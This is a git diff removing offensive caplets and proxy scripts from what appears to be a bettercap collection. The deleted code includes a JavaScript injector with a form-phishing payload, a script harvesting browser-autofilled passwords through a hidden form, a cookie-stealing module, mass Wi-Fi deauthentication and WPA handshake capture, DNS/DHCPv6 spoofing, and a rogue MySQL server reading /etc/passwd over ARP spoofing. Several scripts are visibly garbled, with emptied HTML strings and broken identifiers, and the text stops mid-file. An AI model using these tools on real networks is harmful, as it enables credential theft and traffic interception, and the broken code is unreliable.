+++ /dev/null
@@ -1,25 +0,0 @@
-### JS-INJECT
-
-A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application.
-
-It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and in some cases ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions.
-
-All you have to do is set your payload path in the caplet file.
-
-**jsinject/jsinject.cap**
-
-```sh
-# Set the path to your JavaScript payload
-set jsinject.payload jsinject/payloads/form-phisher.js
-
-set http.proxy.script jsinject/jsinject.js
-set net.sniff.verbose false
-net.sniff on
-http.proxy on
-```
-
-
-
-### Included payload
-
-
form-phisher.js is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit events in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
diff --git a/jsinject/jsinject.cap b/jsinject/jsinject.cap
deleted file mode 100644
index 98f7dfd..0000000
--- a/jsinject/jsinject.cap
+++ /dev/null
@@ -1,8 +0,0 @@
-# Set the path to your JavaScript payload
-set jsinject.payload jsinject/payloads/form-phisher.js
-
-set http.proxy.script jsinject/jsinject.js
-set net.sniff.verbose false
-net.sniff on
-http.proxy on
-#arp.spoof on
diff --git a/jsinject/jsinject.js b/jsinject/jsinject.js
deleted file mode 100644
index 3fc2325..0000000
--- a/jsinject/jsinject.js
+++ /dev/null
@@ -1,51 +0,0 @@
-var session_id,
- payload,
- payload_path,
- payload_container = "" +
- "if (!self.{{session_id}}) {\n" +
- "var {{session_id}} = function() {\n" +
- "{{payload}}\n" +
- "}\n" +
- "{{session_id}}();\n" +
- "}\n"
-
-var green = "\033[32m",
- bold = "\033[1;37m",
- reset = "\033[0m"
-
-function randomString(length) {
- var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
- buffer = ""
- while (buffer.length < length) {
- index = parseInt( Math.random() * chars.length )
- buffer = buffer + chars.charAt(index)
- }
- return buffer
-}
-
-function configure() {
- payload_path = env["jsinject.payload"].replace(/\s/g, "")
- payload = readFile(payload_path)
- payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id)
-}
-
-function onLoad() {
- session_id = randomString( 4 + parseInt( Math.random() * 16 ) )
- configure()
- log_info(green + "jsinject" + reset + " started injecting payload " + bold + payload_path + reset + " into HTTP traffic.")
- log_info(green + "jsinject" + reset + " session ID is " + bold + session_id + reset + ".")
-}
-
-function onResponse(req, res) {
- configure()
- if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) {
- res.ReadBody()
- log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document from " + bold + req.Hostname + reset + " ...")
- res.Body = res.Body.replace(//i, "")
- }
- if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) {
- res.ReadBody()
- log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document from " + bold + req.Hostname + reset + " ...")
- res.Body = payload + res.Body
- }
-}
diff --git a/jsinject/payloads/form-phisher.js b/jsinject/payloads/form-phisher.js
deleted file mode 100644
index 43b24c9..0000000
--- a/jsinject/payloads/form-phisher.js
+++ /dev/null
@@ -1,35 +0,0 @@
-var hooked = false
-
-function callback() {
- var inputs = document.getElementsByTagName("input"),
- textareas = document.getElementsByTagName("textarea"),
- params = ""
- for (var i = 0; i < inputs.length; i++) {
- if (inputs[i].value != "") {
- params = params + inputs[i].name + "=" + inputs[i].value + ( i < (inputs.length-1) ? "&" : "" )
- }
- }
- for (var i = 0; i < textareas.length; i++) {
- if (textareas[i].value != "") {
- params = params + textareas[i].name + "=" + textareas[i].value + ( i < (textareas.length-1) ? "&" : "" )
- }
- }
- if (params.length > 0) {
- req = new XMLHttpRequest()
- req.open("POST", "http://" + location.host + "/bettercap_sniffer_callback?" + params, true)
- req.send()
- }
-}
-
-self.addEventListener("keydown", function(event) {
- (event.key == "Enter" || event.keyCode == 13) ? callback() : ""
- if (hooked == false) {
- self.addEventListener("click", callback)
- self.addEventListener("touchend", callback)
- forms = document.querySelectorAll("form")
- for (var i = 0; i < forms.length; i++) {
- forms[i].addEventListener("submit", callback)
- }
- hooked = true
- }
-})
diff --git a/local-sniffer.cap b/local-sniffer.cap
deleted file mode 100644
index c9c82b1..0000000
--- a/local-sniffer.cap
+++ /dev/null
@@ -1,11 +0,0 @@
-#events.stream off
-events.clear
-# set events.stream.filter net.sniff
-# events.stream on
-
-set net.sniff.verbose false
-set net.sniff.local true
-# https://biot.com/capstats/bpf.html
-# set net.sniff.filter not arp and not udp port 53
-
-net.sniff on
diff --git a/login-manager-abuse/login-man-abuse.cap b/login-manager-abuse/login-man-abuse.cap
deleted file mode 100644
index cf1bb78..0000000
--- a/login-manager-abuse/login-man-abuse.cap
+++ /dev/null
@@ -1,12 +0,0 @@
-# targeting the whole subnet by default, to make it selective:
-#
-# sudo ./bettercap -caplet login-man-abuse.cap -eval "set arp.spoof.targets 192.168.1.53"
-
-set http.proxy.script login-man-abuse.js
-http.proxy on
-sleep 1
-arp.spoof on
-
-
-
-
diff --git a/login-manager-abuse/login-man-abuse.js b/login-manager-abuse/login-man-abuse.js
deleted file mode 100644
index a9c0b89..0000000
--- a/login-manager-abuse/login-man-abuse.js
+++ /dev/null
@@ -1,51 +0,0 @@
-/*
- * Ref.
- * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72
- * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
- *
- * The idea:
- *
- * - On every html page, inject this invisible form who grabs credentials from login managers.
- * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, we'll intercept this request.
- * - Intercept request, dump credentials, drop client to 404.
- */
-var AbuserJavascript = "";
-
-function onLoad() {
- // log( "Loading abuser code from login-man-abuser.js" );
- AbuserJavascript = readFile("/usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuser.js")
-}
-
-// here we intercept the ajax POST request with leaked credentials.
-function onRequest(req, res) {
- if( req.Method == 'POST' && req.Path == "/login-man-abuser" ) {
- log( "[LOGIN MANAGER ABUSER]\n", req.ReadBody() );
- // this was just a fake request we needed to exfiltrate
- // credentials to us, drop the connection with an empty 200.
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Connection", "close");
- res.Status = 200;
- res.ContentType = "text/html";
- res.Body = "";
- }
-}
-
-// inject the javascript in html pages
-function onResponse(req, res) {
- if( res.ContentType.indexOf('text/html') == 0 ){
- var body = res.ReadBody();
- if( body.indexOf('') != -1 ) {
- res.Body = body.replace(
- '',
- '' +
- ''
- );
- }
- }
-}
diff --git a/login-manager-abuse/login-man-abuser.js b/login-manager-abuse/login-man-abuser.js
deleted file mode 100644
index e4d329b..0000000
--- a/login-manager-abuse/login-man-abuser.js
+++ /dev/null
@@ -1,71 +0,0 @@
-/*
- * Ref.
- * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72
- * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
- *
- * The idea:
- *
- * - On every html page, inject this invisible form who grabs credentials from login managers.
- * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, well intercept this request.
- * - Intercept request, dump credentials, drop client to 404.
- */
-var AbuserJavascript =
-var injectForm = function(visible) {
-var container = document.createElement("div");
-if (!visible){
-container.style.display = "none";
-}
-var form = document.createElement("form");
-form.attributes.autocomplete = "on";
-var emailInput = document.createElement("input");
-emailInput.attributes.vcard_name = "vCard.Email";
-emailInput.id = "email";
-emailInput.type = "email";
-emailInput.name = "email";
-form.appendChild(emailInput);
-var passwordInput = document.createElement("input");
-passwordInput.id = "password";
-passwordInput.type = "password";
-passwordInput.name = "password";
-form.appendChild(passwordInput);
-container.appendChild(form);
-document.body.appendChild(container);
-};
-
-var doPOST = function(data) {
-var xhr = new XMLHttpRequest();
-
-xhr.open("POST", "/login-man-abuser");
-xhr.setRequestHeader("Content-Type", "application/json");
-xhr.onload = function() {
-console.log("Enjoy your coffee!");
-};
-
-xhr.send(JSON.stringify(data));
-};
-
-var sniffInputField = function(fieldId){
-var inputElement = document.getElementById(fieldId);
-if (inputElement.value.length){
-return {fieldId: inputElement.value};
-}
-window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms
-};
-
-var sniffInputFields = function(){
-var inputs = document.getElementsByTagName("input");
-data = {};
-for (var i = 0; i < inputs.length; i++) {
-console.log("Will try to sniff element with id: " + inputs[i].id);
-output = stringsniffInputField(inputs[i].id);
-data = Object.assign({}, data, output);
-}
-doPOST(data);
-};
-
-var sniffFormInfo = function(visible) {
-injectForm(visible);
-sniffInputFields();
-};
-
-sniffFormInfo(false);;
diff --git a/mana.cap b/mana.cap
deleted file mode 100644
index 6e5e026..0000000
--- a/mana.cap
+++ /dev/null
@@ -1 +0,0 @@
-!berate_ap --no-virt --mana --mana-loud wlan1 wlan0 FreeWIFI
diff --git a/massdeauth.cap b/massdeauth.cap
deleted file mode 100644
index dc491a5..0000000
--- a/massdeauth.cap
+++ /dev/null
@@ -1,13 +0,0 @@
-set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
-
-# every 10 seconds deauth every client from every ap
-set ticker.period 10
-set ticker.commands clear; wifi.deauth ff:ff:ff:ff:ff:ff
-
-# uncomment to only hop on these channels:
-# wifi.recon.channel 1,2,3
-
-wifi.recon on
-ticker on
-events.clear
-clear
diff --git a/mitm6.cap b/mitm6.cap
deleted file mode 100644
index 0398c87..0000000
--- a/mitm6.cap
+++ /dev/null
@@ -1,20 +0,0 @@
-# let's spoof Microsoft and Google ^_^
-set dns.spoof.domains microsoft.com, google.com
-set dhcp6.spoof.domains microsoft.com, google.com
-
-# every http request to the spoofed hosts will come to us
-# let's give em some contents
-set http.server.path www
-
-# serve files
-http.server on
-# redirect DNS request by spoofing DHCPv6 packets
-dhcp6.spoof on
-# send spoofed DNS replies ^_^
-dns.spoof on
-
-# set a custom prompt for ipv6
-set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
-# clear the events buffer and the screen
-events.clear
-clear
diff --git a/netmon.cap b/netmon.cap
deleted file mode 100644
index d6d2ba5..0000000
--- a/netmon.cap
+++ /dev/null
@@ -1,4 +0,0 @@
-net.recon on
-net.probe on
-clear
-ticker on
diff --git a/pita.cap b/pita.cap
deleted file mode 100644
index 237680a..0000000
--- a/pita.cap
+++ /dev/null
@@ -1,32 +0,0 @@
-# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392
-
-set $ {bold}😈 » {reset}
-
-# make sure wlan0 is in monitor mode
-# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
-!monstop
-!monstart
-
-# every 5 seconds:
-# - clear the screen
-# - show the list of nearby access points
-# - deauth every client from each one of them
-set ticker.period 5
-set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
-# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
-set net.sniff.verbose true
-set net.sniff.filter ether proto 0x888e
-set net.sniff.output wpa.pcap
-
-# uncomment to only hop on these channels:
-# wifi.recon.channel 1,2,3
-wifi.recon on
-ticker on
-net.sniff on
-
-# we'll see lots of probes after each deauth, just skip the noise ...
-events.ignore wifi.client.probe
-# start fresh
-events.clear
-clear
-
diff --git a/proxy-script-test/proxy-script-test.cap b/proxy-script-test/proxy-script-test.cap
deleted file mode 100644
index 02edc91..0000000
--- a/proxy-script-test/proxy-script-test.cap
+++ /dev/null
@@ -1,2 +0,0 @@
-set http.proxy.script proxy-script-test.js
-http.proxy on
diff --git a/proxy-script-test/proxy-script-test.js b/proxy-script-test/proxy-script-test.js
deleted file mode 100644
index b450ae6..0000000
--- a/proxy-script-test/proxy-script-test.js
+++ /dev/null
@@ -1,49 +0,0 @@
-// called when script is loaded
-function onLoad() {
- console.log( "PROXY SCRIPT LOADED" );
-}
-
-// called before a request is proxied
-function onRequest(req, res) {
- if( req.Path == "/test-page" ){
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Server", "bettercap");
- res.SetHeader("Connection", "close");
- res.Status = 200;
- res.ContentType = "text/html";
- res.Body = "" +
- "" +
- "
Test Page" +
- "" +
- "" +
- "
Hello world from bettercap!
" +
- "" +
- "";
- }
-}
-
-// called after a request is proxied and there's a response
-function onResponse(req, res) {
- if( res.Status == 404 ){
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Server", "bettercap");
- res.SetHeader("Connection", "close");
- res.ContentType = "text/html";
- res.Body = "" +
- "" +
- "
Test 404 Page" +
- "" +
- "" +
- "
Custom 404 from bettercap.
" +
- "" +
- "";
- }
-}
diff --git a/pwnagotchi-auto.cap b/pwnagotchi-auto.cap
index 1d5530e..bf19d88 100644
--- a/pwnagotchi-auto.cap
+++ b/pwnagotchi-auto.cap
@@ -1,7 +1,7 @@
# enable interface monitor mode and define wifi interface to be mon0
set wifi.interface wlan0mon
-# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1
+# api listening on http://127.0.0.1:8081/
set api.rest.address 127.0.0.1
set api.rest.port 8081
set api.rest.username pwnagotchi
diff --git a/pwnagotchi-manual.cap b/pwnagotchi-manual.cap
index e501b38..e419418 100644
--- a/pwnagotchi-manual.cap
+++ b/pwnagotchi-manual.cap
@@ -1,16 +1,12 @@
# enable interface monitor mode and define wifi interface to be mon0
set wifi.interface wlan0mon
-# api listening on http://0.0.0.0:8081/ and ui to http://0.0.0.0
+# api listening on http://0.0.0.0:8081/
set api.rest.address 0.0.0.0
set api.rest.port 8081
-set http.server.address 0.0.0.0
-set http.server.port 80
-set http.server.path /usr/local/share/bettercap/ui
set api.rest.username pwnagotchi
set api.rest.password pwnagotchi
set api.rest.websocket true
# go!
api.rest on
-http.server on
diff --git a/rogue-mysql-server.cap b/rogue-mysql-server.cap
deleted file mode 100644
index 9d6efea..0000000
--- a/rogue-mysql-server.cap
+++ /dev/null
@@ -1,21 +0,0 @@
-# set the target for arp spoofing
-set arp.spoof.targets 192.168.1.236
-
-# bind rogue mysql server to localhost and
-# set the file we want to read
-set mysql.server.address 127.0.0.1
-set mysql.server.port 3306
-set mysql.server.infile /etc/passwd
-mysql.server on
-
-# set the ip from the mysql server we want to impersonate
-set tcp.address 93.184.216.34
-set tcp.port 3306
-
-# set the ip from the rogue mysql server
-set tcp.tunnel.address 127.0.0.1
-set tcp.tunnel.port 3306
-
-# go ^_^
-tcp.proxy on
-arp.spoof on
\ No newline at end of file
diff --git a/rtfm/rtfm.cap b/rtfm/rtfm.cap
deleted file mode 100644
index e5a6ab8..0000000
--- a/rtfm/rtfm.cap
+++ /dev/null
@@ -1,8 +0,0 @@
-# targeting the whole subnet by default, to make it selective:
-#
-# sudo ./bettercap -caplet rtfm.cap -eval "set arp.spoof.targets 192.168.1.64"
-
-clear
-set http.proxy.script rtfm.js
-http.proxy on
-arp.spoof on
diff --git a/rtfm/rtfm.js b/rtfm/rtfm.js
deleted file mode 100644
index 6a6c582..0000000
--- a/rtfm/rtfm.js
+++ /dev/null
@@ -1,24 +0,0 @@
-function onRequest(req, res) {
- req.Path = req.Path.replace('-you-did-not-rtfm', '');
-}
-
-function onResponse(req, res) {
- if (res.ContentType.indexOf("text/html") == 0) {
- var body = res.ReadBody();
- res.Body = body.replace(
- /\.(jpg|jpeg|png|gif|bmp)/gi,
- '-you-did-not-rtfm.$1'
- );
- }
- else if (res.ContentType.indexOf("image/jpeg") != -1) {
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Connection", "close");
- res.Status = 200;
- res.Body = readFile("/usr/local/share/bettercap/caplets/www/rtfm_cat.jpg");
- log("RTFM! " + req.Hostname + req.Path + ( req.Query ? "?" + req.Query : ''));
- }
-}
diff --git a/simple-passwords-sniffer.cap b/simple-passwords-sniffer.cap
deleted file mode 100644
index 3a207f5..0000000
--- a/simple-passwords-sniffer.cap
+++ /dev/null
@@ -1,10 +0,0 @@
-set net.sniff.regexp .*password=.+
-set net.sniff.output passwords.cap
-
-# start arp spoofing attack
-# arp.spoof on
-net.sniff on
-
-
-
-
diff --git a/steal-cookies/README.md b/steal-cookies/README.md
deleted file mode 100644
index 193d08d..0000000
--- a/steal-cookies/README.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# Steal cookies
-
-Enumerate each domain from file and steal all cookies without `Secure` flag.
-
diff --git a/steal-cookies/domains.txt b/steal-cookies/domains.txt
deleted file mode 100644
index 51c5c95..0000000
--- a/steal-cookies/domains.txt
+++ /dev/null
@@ -1,10 +0,0 @@
-google.com
-youtube.com
-facebook.com
-baidu.com
-wikipedia.org
-reddit.com
-yahoo.com
-google.co.in
-qq.com
-amazon.com
\ No newline at end of file
diff --git a/steal-cookies/steal-cookies.cap b/steal-cookies/steal-cookies.cap
deleted file mode 100644
index e9513cf..0000000
--- a/steal-cookies/steal-cookies.cap
+++ /dev/null
@@ -1,3 +0,0 @@
-set steal-cookies.domains /usr/share/bettercap/caplets/steal-cookies/domains.txt
-set http.proxy.script steal-cookies.js
-http.proxy on
diff --git a/steal-cookies/steal-cookies.js b/steal-cookies/steal-cookies.js
deleted file mode 100644
index 6e358e5..0000000
--- a/steal-cookies/steal-cookies.js
+++ /dev/null
@@ -1,104 +0,0 @@
-var victims = {}
-
-function Rf(s)
-{
- return "\033[31m" + s + "\033[0m"
-}
-function Rb(s)
-{
- return "\033[41m" + s + "\033[0m"
-}
-
-function onLoad()
-{
- log( "Cookies steal module loaded." );
- log( "targets: " + env['arp.spoof.targets'] );
-}
-
-function onRequest(req, res)
-{
- var ip = req.Client.IP,
- hostname = req.Hostname,
- headers, cookies
-
- headers = req.Headers.replace(/\r\n$/g, "").split("\r\n")
- for (var i = 0; i < headers.length; i++)
- {
- header_name = headers[i].replace(/:.*/, "")
- if(header_name == 'Cookie')
- cookies = headers[i].replace(/.*?: /, "");
- }
-
- if( req.Query.indexOf('__steal') != -1 )
- {
- if(cookies)
- log( Rb( "[+] " + ip + " - " + hostname + " " + cookies ) )
-
- if( victims[ip] && victims[ip].length )
- {
- var hostname_index = victims[ip].indexOf(hostname)
- if( hostname_index != -1 )
- victims[ip].splice( hostname_index, 1 )
-
- if( victims[ip].length )
- res.Body = '\n' +
- '
\n' +
- '\n' +
- '\n' +
- ''
- else
- res.Body = 'end stealing'
- res.Status = 200
- res.ContentType = "text/html"
- res.Headers = "Connection: close"
- }
- }
-}
-
-function onResponse(req, res)
-{
- if( res.ContentType.indexOf('text/html') == 0 )
- {
- var body = res.ReadBody(),
- ip = req.Client.IP
-
- if(! victims[ip] )
- {
- victims[ip] = readFile(env["steal-cookies.domains"]).toString().split('\n')
- body = body.replace(
- '
-
-